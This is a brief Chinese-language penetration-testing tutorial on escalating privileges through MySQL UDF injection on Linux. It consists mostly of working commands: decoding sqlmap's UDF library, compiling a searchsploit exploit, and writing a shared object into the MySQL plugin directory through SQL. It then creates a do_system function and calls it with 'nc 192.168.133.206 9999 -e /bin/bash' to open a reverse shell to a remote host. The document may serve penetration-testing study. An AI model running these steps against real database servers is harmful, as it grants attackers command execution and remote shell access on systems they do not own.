MYSQL提权(LINUX)

select @@global.secure_file_priv;
查看MySQL服务器的文件读写权限
如果是NULL就是完全禁止

udf提权用到的so文件（linux）在kali下默认集成，路径为/usr/share/sqlmap/udf/mysql/linux/64(32)

• 还有一个需要注意的是，sqlmap里的udf.dll是通过异或编码的，使用之前一定要记得解码，解码的工具也在sqlmap中,路径为/usr/share/sqlmap/extra/cloak解密之后会在so目录下生成so文件

• 需要创建udf中存在的函数才可以，可以用十六进制编辑器打开udf.so看一下

图片.png

或者searchsploit mysql udf

图片.png

把对应的内容编译出来

gcc -g -c 1518.c
gcc -g -shared -o  1518.so 1518.o -lc

mysql创建函数命令

use mysql;
show variables like '%plugin%';
create table udf1(line blob);
insert into udf1 values(load_file('/tmp/udf.so'));
select * from udf1 into dumpfile '/usr/lib/mysql/plugin/udf.so';
create function do_system returns integer soname 'udf.so';
select * from mysql.func; #查询是否创建函数成功
select do_system('nc 192.168.133.206 9999 -e /bin/bash');